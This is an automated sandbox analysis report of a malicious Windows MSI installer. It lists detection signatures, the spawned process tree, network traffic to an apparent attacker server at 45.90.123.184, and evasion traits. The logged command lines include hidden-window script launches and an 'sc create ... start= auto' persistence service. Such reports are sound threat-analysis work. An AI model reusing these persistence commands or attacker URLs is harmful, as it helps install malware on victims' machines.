
Windows Analysis Report
hBqTrQLya4.msi

Overview

General Information

Sample name: hBqTrQLya4.msi (renamed because the original name is a hash value)
Original sample name: 29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7.msi
Analysis ID: 1467456
MD5: 5421cd4bbb277efc5b163a75cac629ff
SHA1: 0d20c0bb978dad6bbd9065ebfc20680c241ac1e0
SHA256: 29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7
Tags: msi

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops executables to the windows directory (C:\Windows) and starts them
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 5952 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hBqTrQLya4.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7072 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5776 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIDD62.tmp (PID: 7392 cmdline: "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\ MD5: 768B35409005592DE2333371C6253BC8)
    • MSIDD92.tmp (PID: 7408 cmdline: "C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ MD5: 768B35409005592DE2333371C6253BC8)
    • windows10.exe (PID: 7416 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8260 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8272 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8288 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom. MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8304 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8312 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
        • windows10.exe (PID: 8524 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
  • cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7620 cmdline: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7648 cmdline: sc start MeuServico MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 7540 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 8024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000020.00000002.2509121919.0000000000A41000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000001B.00000002.2499757267.0000000000931000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000001E.00000002.2500873728.00000000009F1000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000001D.00000002.2500761297.0000000000951000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, ProcessId: 7620, ProcessName: sc.exe
No Snort rule has matched


AV Detection

Source: http://www.audio-tool.net; Virustotal: Detection: 5%
Source: http://45.90.123.184/favicon.ico; Virustotal: Detection: 8%
Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll; ReversingLabs: Detection: 50%
Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll; Virustotal: Detection: 43%
Source: hBqTrQLya4.msi; ReversingLabs: Detection: 31%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 87.0% probability
Source: unknown; HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: hBqTrQLya4.msi
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
Source: C:\Windows\System32\msiexec.exe; File opened: z:
Source: C:\Windows\System32\msiexec.exe; File opened: x:
Source: C:\Windows\System32\msiexec.exe; File opened: v:
Source: C:\Windows\System32\msiexec.exe; File opened: t:
Source: C:\Windows\System32\msiexec.exe; File opened: r:
Source: C:\Windows\System32\msiexec.exe; File opened: p:
Source: C:\Windows\System32\msiexec.exe; File opened: n:
Source: C:\Windows\System32\msiexec.exe; File opened: l:
Source: C:\Windows\System32\msiexec.exe; File opened: j:
Source: C:\Windows\System32\msiexec.exe; File opened: h:
Source: C:\Windows\System32\msiexec.exe; File opened: f:
Source: C:\Windows\System32\msiexec.exe; File opened: b:
Source: C:\Windows\System32\msiexec.exe; File opened: y:
Source: C:\Windows\System32\msiexec.exe; File opened: w:
Source: C:\Windows\System32\msiexec.exe; File opened: u:
Source: C:\Windows\System32\msiexec.exe; File opened: s:
Source: C:\Windows\System32\msiexec.exe; File opened: q:
Source: C:\Windows\System32\msiexec.exe; File opened: o:
Source: C:\Windows\System32\msiexec.exe; File opened: m:
Source: C:\Windows\System32\msiexec.exe; File opened: k:
Source: C:\Windows\System32\msiexec.exe; File opened: i:
Source: C:\Windows\System32\msiexec.exe; File opened: g:
Source: C:\Windows\System32\msiexec.exe; File opened: e:
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File opened: c:
Source: C:\Windows\System32\msiexec.exe; File opened: a:
Source: C:\Windows\Installer\MSIDD62.tmp; Code function: 12_2_004205E9 FindFirstFileExW, 12_2_004205E9
Source: C:\Windows\Installer\MSIDD92.tmp; Code function: 13_2_00DB05E9 FindFirstFileExW, 13_2_00DB05E9
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe; Code function: 14_2_008FD08C FindFirstFileW, 14_2_008FD08C
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe; Code function: 26_2_00ADD08C FindFirstFileW, 26_2_00ADD08C
Source: Joe Sandbox View; IP Address: 239.255.255.250
Source: Joe Sandbox View; JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global traffic; HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT | Range: bytes=0-2147483646 | User-Agent: Microsoft BITS/7.8 | Host: fs.microsoft.com
Source: global traffic; HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic; HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic; HTTP traffic detected: GET /clientes/inspecionando.php HTTP/1.1 | Host: 45.90.123.184 | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: 45.90.123.184 | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Referer: http://45.90.123.184/clientes/inspecionando.php | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /clientes/inspecionando.php HTTP/1.1 | Host: 45.90.123.184 | Connection: keep-alive | Cache-Control: max-age=0 | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Referer: http://45.90.123.184/clientes/inspecionando.php | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 04 Jul 2024 07:13:17 GMT | Server: Apache/2.4.41 (Ubuntu) | Content-Length: 275 | Keep-Alive: timeout=5, max=99 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 45.90.123.184 Port 80</address></body></html>
Source: cont.cmd.2.dr; String found in binary or memory: http://45.90.123.184/clientes/inspecionando.php
Source: windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/json/
Source: windows10.exe, 0000000E.00000000.1282464047.0000000000497000.00000002.00000001.01000000.00000006.sdmp; String found in binary or memory: http://www.audio-tool.net
Source: windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2679332883.0000000004C6C000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp; String found in binary or memory: http://www.indyproject.org/
Source: windows10.exe, 00000020.00000002.2679332883.0000000004D48000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/tBXs1wCj

System Summary

Source: StarBurn.dll.2.dr; Static PE information: section name: .ri$
Source: StarBurn.dll.2.dr; Static PE information: section name: .)5y
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe; Code function: 14_2_01B3E928 NtQuerySystemInformation, 14_2_01B3E928
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe; Code function: 14_2_01DBA7C0 NtSetInformationThread, 14_2_01DBA7C0
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\49d147.msi
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSID686.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSID6F5.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSID754.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSID783.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSID7D3.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\SourceHash{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSID8CE.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSIDD62.tmp
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSIDD92.tmp
Source: C:\Windows\System32\msiexec.exe; File deleted: C:\Windows\Installer\MSID686.tmp
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01C844C414_2_01C844C4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01C85C1F14_2_01C85C1F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00ADB5B826_2_00ADB5B8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00D8671026_2_00D86710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CBA2CD26_2_00CBA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00D9741026_2_00D97410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CF46B026_2_00CF46B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CCD9E026_2_00CCD9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CB2AA026_2_00CB2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CB5A3426_2_00CB5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CB9F4D26_2_00CB9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00D79F6C26_2_00D79F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00B0FD4026_2_00B0FD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC46C426_2_00DC46C4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC5E6426_2_00DC5E64
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC86F026_2_00DC86F0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC714B26_2_00DC714B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DE3B8826_2_00DE3B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DDEB1C26_2_00DDEB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00EB87ED26_2_00EB87ED
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00EA1D5A26_2_00EA1D5A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00E66EAC26_2_00E66EAC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00E66C9726_2_00E66C97
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00E6629F26_2_00E6629F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5E5B726_2_01F5E5B7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_020ED66926_2_020ED669
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_0201268626_2_02012686
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5CD4B26_2_01F5CD4B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5D93826_2_01F5D938
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F608E926_2_01F608E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5BCBE26_2_01F5BCBE
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5CFB026_2_01F5CFB0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F613B326_2_01F613B3
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5A77A26_2_01F5A77A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F60B6A26_2_01F60B6A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_0200C8D726_2_0200C8D7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5DF1F26_2_01F5DF1F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_0204293326_2_02042933
            Source: Joe Sandbox View, Dropped File: C:\Users\user\Pictures\fotosdaviagem\windows10.exe 585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
            Source: Joe Sandbox View, Dropped File: C:\Windows\Installer\MSID686.tmp 42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
            Source: C:\Windows\Installer\MSIDD62.tmp, Code function: String function: 004085D0 appears 39 times
            Source: C:\Windows\Installer\MSIDD62.tmp, Code function: String function: 00408246 appears 69 times
            Source: C:\Windows\Installer\MSIDD62.tmp, Code function: String function: 00408213 appears 100 times
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Code function: String function: 00BFC298 appears 37 times
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Code function: String function: 00DDC298 appears 37 times
            Source: C:\Windows\Installer\MSIDD92.tmp, Code function: String function: 00D98213 appears 100 times
            Source: C:\Windows\Installer\MSIDD92.tmp, Code function: String function: 00D98246 appears 69 times
            Source: C:\Windows\Installer\MSIDD92.tmp, Code function: String function: 00D985D0 appears 39 times
            Source: StarBurn.dll.2.dr, Static PE information: Number of sections : 13 > 10
            Source: hBqTrQLya4.msi, Binary or memory string: OriginalFilenameviewer.exeF vs hBqTrQLya4.msi
            Source: hBqTrQLya4.msi, Binary or memory string: OriginalFilenameAICustAct.dllF vs hBqTrQLya4.msi
            Source: classification engine, Classification label: mal84.evad.winMSI@44/35@2/4
            Source: C:\Windows\Installer\MSIDD62.tmp, Code function: 12_2_003E61D0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle
            Source: C:\Windows\Installer\MSIDD62.tmp, Code function: 12_2_003E6EE0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error
            Source: C:\Windows\Installer\MSIDD62.tmp, Code function: 12_2_003E1D70 LoadResource,LockResource,SizeofResource
            Source: C:\Windows\System32\msiexec.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\CMLD965.tmp
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
            Source: C:\Windows\System32\msiexec.exe, File created: C:\Users\user~1\AppData\Local\Temp\MSI9cfef.LOG
            Source: Yara match, File source: 00000020.00000002.2509121919.0000000000A41000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001B.00000002.2499757267.0000000000931000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001E.00000002.2500873728.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001D.00000002.2500761297.0000000000951000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001C.00000002.2499650796.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, File read: C:\Windows\win.ini
            Source: C:\Windows\Installer\MSIDD62.tmp, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: hBqTrQLya4.msi, ReversingLabs: Detection: 31%
            Source: windows10.exe, String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exe, String found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: unknown, Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hBqTrQLya4.msi"
            Source: unknown, Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079
            Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\Installer\MSIDD62.tmp "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
            Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\Installer\MSIDD92.tmp "C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\msiexec.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
            Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\sc.exe sc start MeuServico
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php
